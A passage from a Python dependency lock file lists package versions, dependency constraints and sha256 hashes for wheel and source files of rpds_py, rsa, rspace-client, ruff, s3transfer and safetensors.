"sha256:c48f3fbc3e92c7dd6681a258d22f23adc2eb183c8cb1557d2fcc5a024e80b094"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c0503c5b681566e8b722fe8c4c47cce5c7a51f6935d5c7012c4aefe952a35eed"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:734c41f9f57cc28658d98270d3436dba65bed0cfc730d115b290e970150c540d"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:a5d7ed104d158c0042a6a73799cf0eb576dfd5fc1ace9c47996e52320c37cb7c"}, {file = "rpds_py-0.10.6-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:e3df0bc35e746cce42579826b89579d13fd27c3d5319a6afca9893a9b784ff1b"}, {file = "rpds_py-0.10.6-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:73e0a78a9b843b8c2128028864901f55190401ba38aae685350cf69b98d9f7c9"}, {file = "rpds_py-0.10.6-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:5ed505ec6305abd2c2c9586a7b04fbd4baf42d4d684a9c12ec6110deefe2a063"}, {file = "rpds_py-0.10.6-cp310-none-win32.whl", hash = "sha256:d97dd44683802000277bbf142fd9f6b271746b4846d0acaf0cefa6b2eaf2a7ad"}, {file = "rpds_py-0.10.6-cp310-none-win_amd64.whl", hash = "sha256:b455492cab07107bfe8711e20cd920cc96003e0da3c1f91297235b1603d2aca7"}, {file = "rpds_py-0.10.6-cp311-cp311-macosx_10_7_x86_64.whl", hash = "sha256:e8cdd52744f680346ff8c1ecdad5f4d11117e1724d4f4e1874f3a67598821069"}, {file = "rpds_py-0.10.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:66414dafe4326bca200e165c2e789976cab2587ec71beb80f59f4796b786a238"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cc435d059f926fdc5b05822b1be4ff2a3a040f3ae0a7bbbe672babb468944722"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:8e7f2219cb72474571974d29a191714d822e58be1eb171f229732bc6fdedf0ac"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3953c6926a63f8ea5514644b7afb42659b505ece4183fdaaa8f61d978754349e"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2bb2e4826be25e72013916eecd3d30f66fd076110de09f0e750163b416500721"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7bf347b495b197992efc81a7408e9a83b931b2f056728529956a4d0858608b80"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:102eac53bb0bf0f9a275b438e6cf6904904908562a1463a6fc3323cf47d7a532"}, {file = "rpds_py-0.10.6-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:40f93086eef235623aa14dbddef1b9fb4b22b99454cb39a8d2e04c994fb9868c"}, {file = "rpds_py-0.10.6-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:e22260a4741a0e7a206e175232867b48a16e0401ef5bce3c67ca5b9705879066"}, {file = "rpds_py-0.10.6-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:f4e56860a5af16a0fcfa070a0a20c42fbb2012eed1eb5ceeddcc7f8079214281"}, {file = "rpds_py-0.10.6-cp311-none-win32.whl", hash = "sha256:0774a46b38e70fdde0c6ded8d6d73115a7c39d7839a164cc833f170bbf539116"}, {file = "rpds_py-0.10.6-cp311-none-win_amd64.whl", hash = "sha256:4a5ee600477b918ab345209eddafde9f91c0acd931f3776369585a1c55b04c57"}, {file = "rpds_py-0.10.6-cp312-cp312-macosx_10_7_x86_64.whl", hash = "sha256:5ee97c683eaface61d38ec9a489e353d36444cdebb128a27fe486a291647aff6"}, {file = "rpds_py-0.10.6-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:0713631d6e2d6c316c2f7b9320a34f44abb644fc487b77161d1724d883662e31"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b5a53f5998b4bbff1cb2e967e66ab2addc67326a274567697379dd1e326bded7"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:6a555ae3d2e61118a9d3e549737bb4a56ff0cec88a22bd1dfcad5b4e04759175"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:945eb4b6bb8144909b203a88a35e0a03d22b57aefb06c9b26c6e16d72e5eb0f0"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:52c215eb46307c25f9fd2771cac8135d14b11a92ae48d17968eda5aa9aaf5071"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c1b3cd23d905589cb205710b3988fc8f46d4a198cf12862887b09d7aaa6bf9b9"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:64ccc28683666672d7c166ed465c09cee36e306c156e787acef3c0c62f90da5a"}, {file = "rpds_py-0.10.6-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:516a611a2de12fbea70c78271e558f725c660ce38e0006f75139ba337d56b1f6"}, {file = "rpds_py-0.10.6-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:9ff93d3aedef11f9c4540cf347f8bb135dd9323a2fc705633d83210d464c579d"}, {file = "rpds_py-0.10.6-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:d858532212f0650be12b6042ff4378dc2efbb7792a286bee4489eaa7ba010586"}, {file = "rpds_py-0.10.6-cp312-none-win32.whl", hash = "sha256:3c4eff26eddac49d52697a98ea01b0246e44ca82ab09354e94aae8823e8bda02"}, {file = "rpds_py-0.10.6-cp312-none-win_amd64.whl", hash = "sha256:150eec465dbc9cbca943c8e557a21afdcf9bab8aaabf386c44b794c2f94143d2"}, {file = "rpds_py-0.10.6-cp38-cp38-macosx_10_7_x86_64.whl", hash = "sha256:cf693eb4a08eccc1a1b636e4392322582db2a47470d52e824b25eca7a3977b53"}, {file = "rpds_py-0.10.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4134aa2342f9b2ab6c33d5c172e40f9ef802c61bb9ca30d21782f6e035ed0043"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e782379c2028a3611285a795b89b99a52722946d19fc06f002f8b53e3ea26ea9"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:2f6da6d842195fddc1cd34c3da8a40f6e99e4a113918faa5e60bf132f917c247"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b4a9fe992887ac68256c930a2011255bae0bf5ec837475bc6f7edd7c8dfa254e"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b788276a3c114e9f51e257f2a6f544c32c02dab4aa7a5816b96444e3f9ffc336"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:caa1afc70a02645809c744eefb7d6ee8fef7e2fad170ffdeacca267fd2674f13"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:bddd4f91eede9ca5275e70479ed3656e76c8cdaaa1b354e544cbcf94c6fc8ac4"}, {file = "rpds_py-0.10.6-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:775049dfa63fb58293990fc59473e659fcafd953bba1d00fc5f0631a8fd61977"}, {file = "rpds_py-0.10.6-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:c6c45a2d2b68c51fe3d9352733fe048291e483376c94f7723458cfd7b473136b"}, {file = "rpds_py-0.10.6-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:0699ab6b8c98df998c3eacf51a3b25864ca93dab157abe358af46dc95ecd9801"}, {file = "rpds_py-0.10.6-cp38-none-win32.whl", hash = "sha256:ebdab79f42c5961682654b851f3f0fc68e6cc7cd8727c2ac4ffff955154123c1"}, {file = "rpds_py-0.10.6-cp38-none-win_amd64.whl", hash = "sha256:24656dc36f866c33856baa3ab309da0b6a60f37d25d14be916bd3e79d9f3afcf"}, {file = "rpds_py-0.10.6-cp39-cp39-macosx_10_7_x86_64.whl", hash = "sha256:0898173249141ee99ffcd45e3829abe7bcee47d941af7434ccbf97717df020e5"}, {file = "rpds_py-0.10.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9e9184fa6c52a74a5521e3e87badbf9692549c0fcced47443585876fcc47e469"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5752b761902cd15073a527b51de76bbae63d938dc7c5c4ad1e7d8df10e765138"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:99a57006b4ec39dbfb3ed67e5b27192792ffb0553206a107e4aadb39c5004cd5"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:09586f51a215d17efdb3a5f090d7cbf1633b7f3708f60a044757a5d48a83b393"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e225a6a14ecf44499aadea165299092ab0cba918bb9ccd9304eab1138844490b"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b2039f8d545f20c4e52713eea51a275e62153ee96c8035a32b2abb772b6fc9e5"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:34ad87a831940521d462ac11f1774edf867c34172010f5390b2f06b85dcc6014"}, {file = "rpds_py-0.10.6-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:dcdc88b6b01015da066da3fb76545e8bb9a6880a5ebf89e0f0b2e3ca557b3ab7"}, {file = "rpds_py-0.10.6-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:25860ed5c4e7f5e10c496ea78af46ae8d8468e0be745bd233bab9ca99bfd2647"}, {file = "rpds_py-0.10.6-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:7854a207ef77319ec457c1eb79c361b48807d252d94348305db4f4b62f40f7f3"}, {file = "rpds_py-0.10.6-cp39-none-win32.whl", hash = "sha256:e6fcc026a3f27c1282c7ed24b7fcac82cdd70a0e84cc848c0841a3ab1e3dea2d"}, {file = "rpds_py-0.10.6-cp39-none-win_amd64.whl", hash = "sha256:e98c4c07ee4c4b3acf787e91b27688409d918212dfd34c872201273fdd5a0e18"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-macosx_10_7_x86_64.whl", hash = "sha256:68fe9199184c18d997d2e4293b34327c0009a78599ce703e15cd9a0f47349bba"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:3339eca941568ed52d9ad0f1b8eb9fe0958fa245381747cecf2e9a78a5539c42"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a360cfd0881d36c6dc271992ce1eda65dba5e9368575663de993eeb4523d895f"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:031f76fc87644a234883b51145e43985aa2d0c19b063e91d44379cd2786144f8"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1f36a9d751f86455dc5278517e8b65580eeee37d61606183897f122c9e51cef3"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:052a832078943d2b2627aea0d19381f607fe331cc0eb5df01991268253af8417"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:023574366002bf1bd751ebaf3e580aef4a468b3d3c216d2f3f7e16fdabd885ed"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:defa2c0c68734f4a82028c26bcc85e6b92cced99866af118cd6a89b734ad8e0d"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-musllinux_1_2_aarch64.whl", hash = "sha256:879fb24304ead6b62dbe5034e7b644b71def53c70e19363f3c3be2705c17a3b4"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-musllinux_1_2_i686.whl", hash = "sha256:53c43e10d398e365da2d4cc0bcaf0854b79b4c50ee9689652cdc72948e86f487"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-musllinux_1_2_x86_64.whl", hash = "sha256:3777cc9dea0e6c464e4b24760664bd8831738cc582c1d8aacf1c3f546bef3f65"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-macosx_10_7_x86_64.whl", hash = "sha256:40578a6469e5d1df71b006936ce95804edb5df47b520c69cf5af264d462f2cbb"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:cf71343646756a072b85f228d35b1d7407da1669a3de3cf47f8bbafe0c8183a4"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:10f32b53f424fc75ff7b713b2edb286fdbfc94bf16317890260a81c2c00385dc"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:81de24a1c51cfb32e1fbf018ab0bdbc79c04c035986526f76c33e3f9e0f3356c"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ac17044876e64a8ea20ab132080ddc73b895b4abe9976e263b0e30ee5be7b9c2"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5e8a78bd4879bff82daef48c14d5d4057f6856149094848c3ed0ecaf49f5aec2"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:78ca33811e1d95cac8c2e49cb86c0fb71f4d8409d8cbea0cb495b6dbddb30a55"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:c63c3ef43f0b3fb00571cff6c3967cc261c0ebd14a0a134a12e83bdb8f49f21f"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-musllinux_1_2_aarch64.whl", hash = "sha256:7fde6d0e00b2fd0dbbb40c0eeec463ef147819f23725eda58105ba9ca48744f4"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-musllinux_1_2_i686.whl", hash = "sha256:79edd779cfc46b2e15b0830eecd8b4b93f1a96649bcb502453df471a54ce7977"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-musllinux_1_2_x86_64.whl", hash = "sha256:9164ec8010327ab9af931d7ccd12ab8d8b5dc2f4c6a16cbdd9d087861eaaefa1"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-macosx_10_7_x86_64.whl", hash = "sha256:d29ddefeab1791e3c751e0189d5f4b3dbc0bbe033b06e9c333dca1f99e1d523e"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:30adb75ecd7c2a52f5e76af50644b3e0b5ba036321c390b8e7ec1bb2a16dd43c"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:dd609fafdcdde6e67a139898196698af37438b035b25ad63704fd9097d9a3482"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:6eef672de005736a6efd565577101277db6057f65640a813de6c2707dc69f396"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6cf4393c7b41abbf07c88eb83e8af5013606b1cdb7f6bc96b1b3536b53a574b8"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:ad857f42831e5b8d41a32437f88d86ead6c191455a3499c4b6d15e007936d4cf"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1d7360573f1e046cb3b0dceeb8864025aa78d98be4bb69f067ec1c40a9e2d9df"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d08f63561c8a695afec4975fae445245386d645e3e446e6f260e81663bfd2e38"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-musllinux_1_2_aarch64.whl", hash = "sha256:f0f17f2ce0f3529177a5fff5525204fad7b43dd437d017dd0317f2746773443d"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-musllinux_1_2_i686.whl", hash = "sha256:442626328600bde1d09dc3bb00434f5374948838ce75c41a52152615689f9403"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-musllinux_1_2_x86_64.whl", hash = "sha256:e9616f5bd2595f7f4a04b67039d890348ab826e943a9bfdbe4938d0eba606971"}, {file = "rpds_py-0.10.6.tar.gz", hash = "sha256:4ce5a708d65a8dbf3748d2474b580d606b1b9f91b5c6ab2a316e0b0cf7a4ba50"}, ] [[package]] name = "rsa" version = "4.9" description = "Pure-Python RSA implementation" optional = true python-versions = ">=3.6,<4" files = [ {file = "rsa-4.9-py3-none-any.whl", hash = "sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7"}, {file = "rsa-4.9.tar.gz", hash = "sha256:e38464a49c6c85d7f1351b0126661487a7e0a14a50f1675ec50eb34d4f20ef21"}, ] [package.dependencies] pyasn1 = ">=0.1.3" [[package]] name = "rspace-client" version = "2.5.0" description = "A client for calling RSpace ELN and Inventory APIs" optional = true python-versions = ">=3.7.11,<4.0.0" files = [ {file = "rspace-client-2.5.0.tar.gz", hash = "sha256:101abc83d094051d2babcaa133fa1a47221b3d5953d72eef3c331ef7084071a1"}, {file = "rspace_client-2.5.0-py3-none-any.whl", hash = "sha256:b1072df88dfa8f068f3137584d20cf135493b0521a9809c2f6ddec6b378a9cc3"}, ] [package.dependencies] beautifulsoup4 = ">=4.9.3,<5.0.0" requests = ">=2.25.1,<3.0.0" [[package]] name = "ruff" version = "0.1.3" description = "An extremely fast Python linter, written in Rust." optional = false python-versions = ">=3.7" files = [ {file = "ruff-0.1.3-py3-none-macosx_10_7_x86_64.whl", hash = "sha256:b46d43d51f7061652eeadb426a9e3caa1e0002470229ab2fc19de8a7b0766901"}, {file = "ruff-0.1.3-py3-none-macosx_10_9_x86_64.macosx_11_0_arm64.macosx_10_9_universal2.whl", hash = "sha256:b8afeb9abd26b4029c72adc9921b8363374f4e7edb78385ffaa80278313a15f9"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ca3cf365bf32e9ba7e6db3f48a4d3e2c446cd19ebee04f05338bc3910114528b"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:4874c165f96c14a00590dcc727a04dca0cfd110334c24b039458c06cf78a672e"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:eec2dd31eed114e48ea42dbffc443e9b7221976554a504767ceaee3dd38edeb8"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_ppc64.manylinux2014_ppc64.whl", hash = "sha256:dc3ec4edb3b73f21b4aa51337e16674c752f1d76a4a543af56d7d04e97769613"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e3de9ed2e39160800281848ff4670e1698037ca039bda7b9274f849258d26ce"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1c595193881922cc0556a90f3af99b1c5681f0c552e7a2a189956141d8666fe8"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0f75e670d529aa2288cd00fc0e9b9287603d95e1536d7a7e0cafe00f75e0dd9d"}, {file = "ruff-0.1.3-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:76dd49f6cd945d82d9d4a9a6622c54a994689d8d7b22fa1322983389b4892e20"}, {file = "ruff-0.1.3-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:918b454bc4f8874a616f0d725590277c42949431ceb303950e87fef7a7d94cb3"}, {file = "ruff-0.1.3-py3-none-musllinux_1_2_i686.whl", hash = "sha256:d8859605e729cd5e53aa38275568dbbdb4fe882d2ea2714c5453b678dca83784"}, {file = "ruff-0.1.3-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:0b6c55f5ef8d9dd05b230bb6ab80bc4381ecb60ae56db0330f660ea240cb0d4a"}, {file = "ruff-0.1.3-py3-none-win32.whl", hash = "sha256:3e7afcbdcfbe3399c34e0f6370c30f6e529193c731b885316c5a09c9e4317eef"}, {file = "ruff-0.1.3-py3-none-win_amd64.whl", hash = "sha256:7a18df6638cec4a5bd75350639b2bb2a2366e01222825562c7346674bdceb7ea"}, {file = "ruff-0.1.3-py3-none-win_arm64.whl", hash = "sha256:12fd53696c83a194a2db7f9a46337ce06445fb9aa7d25ea6f293cf75b21aca9f"}, {file = "ruff-0.1.3.tar.gz", hash = "sha256:3ba6145369a151401d5db79f0a47d50e470384d0d89d0d6f7fab0b589ad07c34"}, ] [[package]] name = "s3transfer" version = "0.7.0" description = "An Amazon S3 Transfer Manager" optional = true python-versions = ">= 3.7" files = [ {file = "s3transfer-0.7.0-py3-none-any.whl", hash = "sha256:10d6923c6359175f264811ef4bf6161a3156ce8e350e705396a7557d6293c33a"}, {file = "s3transfer-0.7.0.tar.gz", hash = "sha256:fd3889a66f5fe17299fe75b82eae6cf722554edca744ca5d5fe308b104883d2e"}, ] [package.dependencies] botocore = ">=1.12.36,<2.0a.0" [package.extras] crt = ["botocore[crt] (>=1.20.29,<2.0a.0)"] [[package]] name = "safetensors" version = "0.4.0" description = "" optional = true python-versions = ">=3.7" files = [ {file = "safetensors-0.4.0-cp310-cp310-macosx_10_7_x86_64.whl", hash = "sha256:2289ae6dbe6d027ecee016b28ced13a2e21a0b3a3a757a23033a2d1c0b1bad55"}, {file = "safetensors-0.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:bf6458959f310f551cbbeef2255527ade5f783f952738e73e4d0136198cc3bfe"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b6b60a58a8f7cc7aed3b5b73dce1f5259a53c83d9ba43a76a874e6ad868c1b4d"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:491b3477e4d0d4599bb75d79da4b75af2e6ed9b1f6ec2b715991f0bc927bf09a"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:59d2e10b7e0cd18bb73ed7c17c624a5957b003b81345e18159591771c26ee428"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3f667a4c12fb593f5f66ce966cb1b14a7148898b2b1a7f79e0761040ae1e3c51"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5f9909512bcb6f712bdd04c296cdfb0d8ff73d258ffc5af884bb62ea02d221e0"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d33d29e846821f0e4f92614022949b09ccf063cb36fe2f9fe099cde1efbfbb87"}, {file = "safetensors-0.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:4d512525a8e05a045ce6698066ba0c5378c174a83e0b3720a8c7799dc1bb06f3"}, {file = "safetensors-0.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:0219cea445177f6ad1f9acd3a8d025440c8ff436d70a4a7c7ba9c36066aa9474"}, {file = "safetensors-0.4.0-cp310-none-win32.whl", hash = "sha256:67ab171eeaad6972d3971c53d29d53353c67f6743284c6d637b59fa3e54c8a94"}, {file = "safetensors-0.4.0-cp310-none-win_amd64.whl", hash = "sha256:7ffc736039f08a9ca1f09816a7481b8e4469c06e8f8a5ffa8cb67ddd79e6d77f"}, {file = "safetensors-0.4.0-cp311-cp311-macosx_10_7_x86_64.whl", hash = "sha256:4fe9e3737b30de458225a23926219ca30b902ee779b6a3df96eaab2b6d625ec2"}, {file = "safetensors-0.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e7916e814a90008de767b1c164a1d83803693c661ffe9af5a697b22e2752edb0"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cbc4a4da01143472323c145f3c289e5f6fabde0ac0a3414dabf912a21692fff4"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:a54c21654a47669b38e359e8f852af754b786c9da884bb61ad5e9af12bd71ccb"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:25cd407955bad5340ba17f9f8ac789a0d751601a311e2f7b2733f9384478c95e"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:82e8fc4e3503cd738fd40718a430fe0e5ce6e7ff91a73d6ce628bbb89c41e8ce"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:48b92059b1a4ad163024d4f526e0e73ebe2bb3ae70537e15e347820b4de5dc27"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:5daa05058f7dce85b5f9f60c4eab483ed7859d63978f08a76e52e78859ff20ca"}, {file = "safetensors-0.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:a86565a5c112dd855909e20144947b4f53abb78c4de207f36ca71ee63ba5b90d"}, {file = "safetensors-0.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:38032078ed9fea52d06584e441bccc73fb475c4581600c6d6166de2fe2deb3d1"}, {file = "safetensors-0.4.0-cp311-none-win32.whl", hash = "sha256:2f99d90c91b7c76b40a862acd9085bc77f7974a27dee7cfcebe46149af5a99a1"}, {file = "safetensors-0.4.0-cp311-none-win_amd64.whl", hash = "sha256:74e2a448ffe19be188b457b130168190ee73b5a75e45ba96796320c1f5ae35d2"}, {file = "safetensors-0.4.0-cp312-cp312-macosx_10_7_x86_64.whl", hash = "sha256:1e2f9c69b41d03b4826ffb96b29e07444bb6b34a78a7bafd0b88d59e8ec75b8a"}, {file = "safetensors-0.4.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:3910fb5bf747413b59f1a34e6d2a993b589fa7d919709518823c70efaaa350bd"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cf8fdca709b2470a35a59b1e6dffea75cbe1214b22612b5dd4c93947697aea8b"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:2f27b8ef814c5fb43456caeb7f3cbb889b76115180aad1f42402839c14a47c5b"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7b2d6101eccc43c7be0cb052f13ceda64288b3d8b344b988ed08d7133cbce2f3"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:fdc34027b545a69be3d4220c140b276129523e4e46db06ad1a0b60d6a4cf9214"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:db7bb48ca9e90bb9526c71b388d38d8de160c0354f4c5126df23e8701a870dcb"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:a78ffc0795d3595cd9e4d453502e35f764276c49e434b25556a15a337db4dafc"}, {file = "safetensors-0.4.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = 